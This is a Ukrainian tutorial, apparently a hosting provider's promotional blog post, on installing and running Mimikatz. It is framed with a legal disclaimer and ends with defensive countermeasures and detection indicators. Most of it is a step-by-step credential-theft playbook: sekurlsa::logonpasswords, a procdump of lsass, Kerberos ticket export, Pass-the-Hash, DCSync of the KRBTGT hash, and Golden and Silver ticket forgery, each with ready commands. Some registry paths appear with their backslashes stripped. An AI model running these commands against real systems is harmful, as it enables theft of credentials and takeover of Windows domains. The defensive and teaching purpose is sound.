Як встановити та використовувати Mimikatz: повний посібник для фахівців з безпеки

Mimikatz — один із найвідоміших та найбільш обговорюваних інструментів у світі кібербезпеки. Спочатку розроблений як демонстраційна концепція для виявлення вразливостей у автентифікації Windows, він став незамінним інструментом у арсеналі тестувальників на проникнення, red team-фахівців та дослідників безпеки. Цей посібник містить детальний огляд того, що таке Mimikatz, хто його використовує та як відповідально встановити й використовувати його в контрольованому середовищі.

> Правове застереження: Mimikatz дозволяється використовувати лише на системах, якими ви володієте або на тестування яких маєте явний письмовий дозвіл. Несанкціоноване використання є незаконним і може призвести до серйозних кримінальних покарань. Цей посібник призначений виключно для освітніх цілей та законного тестування безпеки.

—

Що таке Mimikatz?

Mimikatz — це інструмент безпеки Windows з відкритим вихідним кодом, створений французьким дослідником безпеки Бенджаміном Делпі. Його основна функція — витягування облікових даних автентифікації, включаючи паролі у відкритому тексті, хеші паролів NTLM, PIN-коди та квитки Kerberos, — безпосередньо з пам’яті системи Windows (зокрема з процесу LSASS).

Оскільки Windows історично кешувала облікові дані в пам’яті для підтримки безперебійної автентифікації між службами, Mimikatz зміг виявити фундаментальну конструктивну слабкість у тому, як операційна система обробляла конфіденційні дані автентифікації. Відтоді Microsoft запровадила засоби захисту, такі як Credential Guard та захищена група користувачів Protected Users, але Mimikatz продовжує розвиватися разом із цими засобами захисту, що робить його безцінним довідковим інструментом для розуміння поточного ландшафту загроз.

Ключові можливості Mimikatz

• Витягування паролів у відкритому тексті з пам’яті Windows (LSASS)
• Дамп хешів NTLM з бази даних SAM та Active Directory
• Витягування та маніпуляція квитками Kerberos (атаки Golden Ticket, Silver Ticket)
• Pass-the-Hash (PtH) — автентифікація з використанням захоплених хешів
• Pass-the-Ticket (PtT) — атаки з використанням викрадених квитків Kerberos
• DCSync-атаки для реплікації даних контролера домену без прямого доступу

—

Хто використовує Mimikatz і навіщо?

Легітимні випадки використання в сфері безпеки

Mimikatz переважно використовується фахівцями з інформаційної безпеки в таких контекстах:

• Тестування на проникнення — Симуляція реальних атак на крадіжку облікових даних для оцінки того, наскільки добре захист організації витримує дії зловмисника, який отримав початковий доступ.
• Red team операції — Емуляція технік просунутих постійних загроз (APT) для перевірки можливостей виявлення та реагування blue team-фахівців та аналітиків SOC.
• Аудити безпеки — Оцінка того, чи зберігаються та захищаються паролі та квитки Kerberos відповідно до найкращих практик безпеки.
• Навчання та підвищення обізнаності — Демонстрація системним адміністраторам та інженерам того, як саме атаки на основі облікових даних працюють на практиці, що робить абстрактні загрози відчутними та зрозумілими.
• Дослідження вразливостей — Виявлення нових слабких місць у механізмах автентифікації Windows до того, як зловмисники зможуть їх використати.

Зловмисне використання

На жаль, Mimikatz також є улюбленим інструментом зловмисників завдяки своїй ефективності. Поширені зловмисні випадки використання включають:

• Pass-the-Hash атаки — Автентифікація в системах з використанням захоплених хешів NTLM без знання оригінального пароля у відкритому тексті.
• Pass-the-Ticket атаки — Використання викрадених квитків Kerberos для імітації легітимних користувачів у мережі.
• Постексплуатаційна стійкість — Збір облікових даних після початкового злому для бокового переміщення по мережі та підвищення привілеїв.
• Golden Ticket атаки — Підробка Kerberos Ticket Granting Tickets (TGT) для отримання постійного, майже необмеженого доступу до ресурсів домену.

Розуміння того, як зловмисники використовують Mimikatz, — це саме та причина, чому захисники повинні бути з ним знайомі. Якщо ви керуєте середовищем VPS Hosting або адмініструєте виділену інфраструктуру, знання цих векторів атак допомагає вам будувати більш стійкий захист.

—

Передумови

Перш ніж продовжити, переконайтеся, що у вашому авторизованому тестовому середовищі виконані такі умови:

> Найкраща практика: Завжди виконуйте тестування Mimikatz всередині ізольованої віртуальної машини або виділеного лабораторного сервера. Якщо вам потрібне безпечне ізольоване середовище для лабораторій тестування на проникнення, розгляньте можливість розгортання екземпляра VPS Hosting з образом Windows, щоб повністю відокремити ваші тести від виробничої інфраструктури.

—

Крок 1: Завантаження Mimikatz

1.1 Відвідайте офіційний репозиторій GitHub

Mimikatz підтримується як проект з відкритим вихідним кодом. Завжди завантажуйте його з офіційного джерела, щоб уникнути модифікованих або троянізованих версій:

Офіційний репозиторій: https://github.com/gentilkiwi/mimikatz

1.2 Завантажте останній реліз

1. Перейдіть до розділу Releases репозиторію (права бічна панель або через шлях URL /releases).
2. Знайдіть найновіший стабільний реліз.
3. Завантажте попередньо скомпільований архів — зазвичай він називається mimikatz_trunk.zip.

1.3 Розпакуйте архів

1. Клацніть правою кнопкою миші на завантаженому ZIP-файлі.
2. Виберіть Витягти все…
3. Виберіть цільову директорію, наприклад: C:SecurityToolsMimikatz

Після розпакування ви знайдете дві піддиректорії:

• x64 — 64-бітні бінарні файли (використовуйте на сучасних системах)
• Win32 — 32-бітні бінарні файли (для застарілих систем)

Основний виконуваний файл, з яким ви будете працювати, — це mimikatz.exe.

—

Крок 2: Запуск Mimikatz

2.1 Відкрийте командний рядок з підвищеними привілеями

Mimikatz потребує адміністративних привілеїв для взаємодії із захищеними областями пам’яті. Щоб запустити оболонку з підвищеними привілеями:

1. Натисніть Windows + X
2. Виберіть Командний рядок (Адміністратор) або Windows PowerShell (Адміністратор)
3. Натисніть Так у запиті UAC

2.2 Перейдіть до директорії Mimikatz

cd C:SecurityToolsMimikatzx64

Переконайтеся, що mimikatz.exe присутній у цій директорії:

dir mimikatz.exe

2.3 Запустіть Mimikatz

mimikatz.exe

Якщо інструмент запустився успішно, ви побачите банер Mimikatz та інтерактивний рядок введення:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

Рядок введення mimikatz # підтверджує, що інструмент працює та готовий приймати команди.

2.4 Увімкніть привілеї налагодження

Перед виконанням більшості команд витягування облікових даних підвищте власні привілеї Mimikatz у межах сесії:

mimikatz # privilege::debug

Очікуваний результат:

Privilege '20' OK

Це надає Mimikatz право SeDebugPrivilege, яке необхідне для читання пам’яті захищених процесів, таких як LSASS.

—

Крок 3: Основні команди Mimikatz

3.1 Витягування паролів у відкритому тексті з пам’яті

Це найвідоміша можливість Mimikatz. Вона зчитує облікові дані, кешовані провайдером автентифікації WDigest, безпосередньо з пам’яті LSASS:

mimikatz # sekurlsa::logonpasswords

Що повертає:

• Імена користувачів, що увійшли в систему
• Імена доменів
• Паролі у відкритому тексті (якщо увімкнено кешування WDigest)
• Хеші NTLM
• Хеші SHA1
• Облікові дані Kerberos

> Примітка: У Windows 8.1 та пізніших версіях Microsoft вимкнула кешування паролів у відкритому тексті WDigest за замовчуванням. Однак зловмисники (та тестувальники) можуть повторно увімкнути його через ключ реєстру, саме тому це залишається актуальним тестовим випадком.

3.2 Відображення збережених паролів (альтернативна команда)

mimikatz # sekurlsa::passwords

Ця команда надає спрощений вигляд облікових даних, доступних у системній пам’яті.

3.3 Витягування облікових даних з файлу дампу пам’яті

Якщо ви не можете запустити Mimikatz безпосередньо на цільовій системі, ви можете спочатку захопити дамп пам’яті LSASS та проаналізувати його в автономному режимі:

Створіть дамп за допомогою Диспетчера завдань:

1. Відкрийте Диспетчер завдань → вкладка Деталі
2. Клацніть правою кнопкою миші на lsass.exe → Створити файл дампу

Або використовуйте ProcDump (із Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Проаналізуйте дамп за допомогою Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Перелік квитків Kerberos

Щоб перерахувати всі квитки Kerberos, наявні в поточному сеансі входу:

mimikatz # kerberos::list

Щоб перерахувати квитки з повними деталями, включаючи ключі сесії:

mimikatz # kerberos::list /export

Це експортує кожен квиток як файл .kirbi, який можна використовувати в атаках Pass-the-Ticket.

3.5 Експорт облікових даних у файл

Щоб зберегти результат дампу облікових даних у текстовий файл для подальшого аналізу:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

Результат буде записано до credentials.txt за вказаним шляхом.

—

Крок 4: Розширені техніки Mimikatz

4.1 Pass-the-Hash (PtH) атака

Pass-the-Hash дозволяє автентифікуватися у віддаленій системі, використовуючи захоплений хеш NTLM, без необхідності знати пароль у відкритому тексті:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Це породжує новий процес cmd.exe, автентифікований як вказаний користувач з використанням хешу.

4.2 Golden Ticket атака

Golden Ticket — це підроблений Kerberos TGT, підписаний хешем пароля облікового запису KRBTGT, що надає власнику майже необмежений доступ до ресурсів домену. Для цього потрібен хеш KRBTGT, який можна отримати через DCSync:

Крок 1 — DCSync для витягування хешу KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Крок 2 — Створення Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Крок 3 — Впровадження квитка:

mimikatz # kerberos::ptt golden.kirbi

4.3 Дамп хешів NTLM з бази даних SAM

Щоб витягти хеші локальних облікових записів з бази даних SAM (потрібні привілеї SYSTEM):

mimikatz # lsadump::sam

4.4 Дамп секретів з LSA

mimikatz # lsadump::secrets

Це отримує секрети LSA, які можуть включати облікові дані службових облікових записів, кешовані облікові дані домену та інші конфіденційні дані, що зберігаються локальним органом безпеки.

4.5 Silver Ticket атака

Silver Ticket націлений на конкретну службу, а не на весь домен. Для цього потрібен хеш NTLM цільового службового облікового запису:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Крок 5: Захисні контрзаходи

Розуміння того, як працює Mimikatz, — це лише половина рівняння. Інша половина — знання того, як захиститися від нього. Якщо ви керуєте серверами Windows — чи то на Виділених серверах, чи то в хмарній інфраструктурі — наступні засоби захисту є критично важливими:

5.1 Увімкніть Credential Guard

Windows Credential Guard використовує безпеку на основі віртуалізації (VBS) для ізоляції LSASS у захищеному контейнері, запобігаючи читанню Mimikatz облікових даних безпосередньо з пам’яті.

Увімкнення через групову політику:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Вимкніть автентифікацію WDigest

Запобігайте кешуванню паролів у відкритому тексті, вимкнувши WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Додайте користувачів до групи Protected Users

Члени групи безпеки Protected Users не можуть автентифікуватися за допомогою NTLM, DES або шифрування Kerberos RC4, що значно обмежує ефективність атак на крадіжку облікових даних.

5.4 Реалізуйте захист LSA (RunAsPPL)

Увімкніть Protected Process Light (PPL) для LSASS, щоб запобігти несанкціонованому доступу до пам’яті:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Моніторинг індикаторів Mimikatz

Налаштуйте своє рішення SIEM або EDR для сповіщення про:

• Доступ до пам’яті lsass.exe з неочікуваних процесів
• SeDebugPrivilege надається несистемним процесам
• Підозрілі шаблони команд sekurlsa, kerberos або lsadump у журналах процесів
• Незвичайні події створення файлів дампу LSASS (Event ID 4656, 4663)

5.6 Підтримуйте системи в актуальному стані

Багато технік Mimikatz використовують відомі вразливості або застарілу поведінку. Підтримка Windows та Active Directory у повністю оновленому стані усуває цілі класи векторів атак.

—

Mimikatz у контексті безпечної хостингової інфраструктури

Для організацій, що запускають веб-додатки, API або внутрішні служби, ризик крадіжки облікових даних виходить за межі локальної робочої станції. Якщо зловмисник отримує доступ до вашого серверного середовища, такі інструменти, як Mimikatz, можуть бути використані для підвищення привілеїв та бокового переміщення.

Вибір хостинг-провайдера, який надає пріоритет безпеці на рівні інфраструктури, є важливим рівнем захисту. Незалежно від того, чи потрібен вам Спільний веб-хостинг для менших проектів або Виділені сервери для корпоративних навантажень, забезпечення того, що ваше хостингове середовище включає DDoS-захист, мережеву ізоляцію та регулярні оновлення безпеки, зменшує загальну поверхню атаки.

Для команд, що керують середовищами Active Directory або додатками на основі Windows, поєднання вашої інфраструктури з належним чином налаштованими SSL-сертифікатами гарантує, що облікові дані, що передаються між клієнтами та серверами, зашифровані під час передачі — додаючи ще один рівень захисту від перехоплення.

—

Підсумок: довідник команд Mimikatz

—

Висновок

Mimikatz залишається одним із найпотужніших та найбільш повчальних інструментів, доступних фахівцям з кібербезпеки. Його здатність виявляти фундаментальні слабкості в механізмах автентифікації Windows спонукала до значних покращень у тому, як Microsoft проектує захист облікових даних — від Credential Guard до Protected Users та LSA PPL. Для тестувальників на проникнення, red team-фахівців та дослідників безпеки глибоке розуміння Mimikatz не є необов’язковим — воно є обов’язковим.

Ключові принципи, які слід завжди пам’ятати:

• Завжди отримуйте явний письмовий дозвіл перед використанням Mimikatz на будь-якій системі.
• Використовуйте ізольовані середовища — віртуальні машини або виділені лабораторні сервери — щоб уникнути випадкового розкриття.
• Розумійте засоби захисту так само глибоко, як розумієте атаки.
• Залишайтеся в курсі подій — і Mimikatz, і засоби захисту Windows постійно розвиваються.

Поєднуючи практичні знання таких інструментів, як Mimikatz, із безпечною, добре налаштованою хостинговою інфраструктурою, команди безпеки можуть будувати захист, який реально перевірений проти реальних технік атак, а не теоретичних припущень.

—

*AlexHost надає безпечні, високопродуктивні хостингові рішення, розроблені з урахуванням потреб фахівців, орієнтованих на безпеку. Ознайомтеся з нашими планами VPS Hosting та Виділених серверів, щоб побудувати своє наступне безпечне лабораторне або виробниче середовище.*